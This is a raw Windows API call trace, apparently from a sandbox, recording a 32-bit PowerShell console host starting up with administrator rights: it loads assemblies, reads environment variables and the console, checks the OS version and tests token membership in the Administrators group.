	[0202.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0202.863] GetLastError () returned 0x0
	[0202.878] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.878] GetLastError () returned 0xcb
	[0204.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xae8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0204.000] GetLastError () returned 0x2
	[0204.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xae8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0204.001] GetLastError () returned 0x2
	[0204.427] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.427] GetLastError () returned 0xcb
	[0204.429] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.429] GetLastError () returned 0xcb
	[0204.565] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.565] GetLastError () returned 0xcb
	[0204.566] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.566] GetLastError () returned 0xcb
	[0204.566] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.566] GetLastError () returned 0xcb
	[0207.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xae8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0207.013] GetLastError () returned 0x0
	[0207.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xae8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0207.013] GetLastError () returned 0x0
	[0207.040] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0207.040] GetLastError () returned 0xcb
	[0207.042] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0207.043] GetLastError () returned 0xcb
	[0207.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0207.317] GetLastError () returned 0x7e
	[0207.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0207.317] GetLastError () returned 0x7e
	[0210.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xae8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0210.059] GetLastError () returned 0x2
	[0210.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xae8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0210.059] GetLastError () returned 0x2
	[0211.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0211.543] GetLastError () returned 0x57
	[0211.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0211.543] GetLastError () returned 0x57
	[0213.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xae8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0213.329] GetLastError () returned 0x2
	[0213.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xae8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0213.329] GetLastError () returned 0x2
	[0215.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xae8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0215.378] GetLastError () returned 0x2
	[0215.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xae8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0215.378] GetLastError () returned 0x2
	[0215.738] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0215.738] GetLastError () returned 0xcb
	[0215.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae988, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0215.768] GetLastError () returned 0xcb
	[0215.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae938, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0215.769] GetLastError () returned 0xcb
	[0215.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae938, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0215.769] GetLastError () returned 0xcb
	[0215.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae938, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0215.778] GetLastError () returned 0xcb
	[0216.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xae8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0216.919] GetLastError () returned 0x2
	[0216.919] SetErrorMode (uMode=0x1) returned 0x1
	[0216.920] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xaed74 | out: lpFileInformation=0xaed74*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0216.920] GetLastError () returned 0x2
	[0216.920] SetErrorMode (uMode=0x1) returned 0x1
	[0220.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae988, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0220.540] GetLastError () returned 0x0
	[0220.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae938, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0220.540] GetLastError () returned 0x0
	[0220.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae938, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0220.541] GetLastError () returned 0x0
	[0220.545] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0220.545] GetLastError () returned 0xcb
	[0220.549] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0220.549] GetLastError () returned 0xcb
	[0220.549] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0220.549] GetLastError () returned 0xcb
	[0220.552] CoCreateGuid (in: pguid=0xaee54 | out: pguid=0xaee54*(Data1=0x8f999e0a, Data2=0x1872, Data3=0x4d28, Data4=([0]=0x95, [1]=0x9b, [2]=0x22, [3]=0xa1, [4]=0xe4, [5]=0x7f, [6]=0x73, [7]=0x14))) returned 0x0
	[0220.557] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0220.557] GetLastError () returned 0xcb
	[0220.561] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0220.561] GetLastError () returned 0xcb
	[0220.563] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0220.563] GetLastError () returned 0xcb
	[0220.574] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0220.789] GetLastError () returned 0x0
	[0220.792] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xaed34 | out: lpConsoleScreenBufferInfo=0xaed34) returned 1
	[0220.792] GetLastError () returned 0x0
	[0220.798] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0220.798] GetLastError () returned 0x0
	[0220.798] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xaed34 | out: lpConsoleScreenBufferInfo=0xaed34) returned 1
	[0220.798] GetLastError () returned 0x0
	[0220.799] GetVersionExW (in: lpVersionInformation=0x3582b8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3582b8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0220.799] GetLastError () returned 0x0
	[0220.801] GetCurrentProcess () returned 0xffffffff
	[0220.801] GetLastError () returned 0x3f0
	[0220.804] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xaed44 | out: TokenHandle=0xaed44*=0x354) returned 1
	[0220.804] GetLastError () returned 0x3f0
	[0220.808] GetTokenInformation (in: TokenHandle=0x354, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xaed9c | out: TokenInformation=0x0, ReturnLength=0xaed9c) returned 0
	[0220.808] GetLastError () returned 0x7a
	[0220.810] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x344b00
	[0220.810] GetLastError () returned 0x7a
	[0220.810] GetTokenInformation (in: TokenHandle=0x354, TokenInformationClass=0x8, TokenInformation=0x344b00, TokenInformationLength=0x4, ReturnLength=0xaed9c | out: TokenInformation=0x344b00, ReturnLength=0xaed9c) returned 1
	[0220.810] GetLastError () returned 0x7a
	[0220.814] DuplicateTokenEx (in: hExistingToken=0x354, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xaed54 | out: phNewToken=0xaed54*=0x34c) returned 1
	[0220.814] GetLastError () returned 0x7f
	[0220.814] GetTokenInformation (in: TokenHandle=0x354, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xaed9c | out: TokenInformation=0x0, ReturnLength=0xaed9c) returned 0
	[0220.814] GetLastError () returned 0x7a
	[0220.814] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x344ae0
	[0220.814] GetLastError () returned 0x7a
	[0220.814] GetTokenInformation (in: TokenHandle=0x354, TokenInformationClass=0x8, TokenInformation=0x344ae0, TokenInformationLength=0x4, ReturnLength=0xaed9c | out: TokenInformation=0x344ae0, ReturnLength=0xaed9c) returned 1
	[0220.815] GetLastError () returned 0x7a
	[0220.816] CheckTokenMembership (in: TokenHandle=0x34c, SidToCheck=0x29dd954*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xaed30 | out: IsMember=0xaed30) returned 1
	[0220.816] GetLastError () returned 0x7a
	[0220.816] CloseHandle (hObject=0x34c) returned 1
	[0220.816] GetLastError () returned 0x7a
	[0220.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae844, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0220.816] GetLastError () returned 0x7a
	[0220.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0220.816] GetLastError () returned 0x7a
	[0220.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0220.817] GetLastError () returned 0x7a
	[0220.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0220.817] GetLastError () returned 0x7a
	[0220.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae844, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0220.960] GetLastError () returned 0x7a
	[0220.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0220.960] GetLastError () returned 0x7a
	[0220.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0220.961] GetLastError () returned 0x7a
	[0220.965] GetConsoleTitleW (in: lpConsoleTitle=0x358a60, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0221.178] GetLastError () returned 0x7a
	[0221.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.196] GetLastError () returned 0x7a
	[0221.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.196] GetLastError () returned 0x7a
	[0221.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.197] GetLastError () returned 0x7a
	[0221.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.197] GetLastError () returned 0x7a
	[0221.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.218] GetLastError () returned 0x7a
	[0221.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.218] GetLastError () returned 0x7a
	[0221.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.218] GetLastError () returned 0x7a
	[0221.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.219] GetLastError () returned 0x7a
	[0221.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0221.219] GetLastError () returned 0x7a
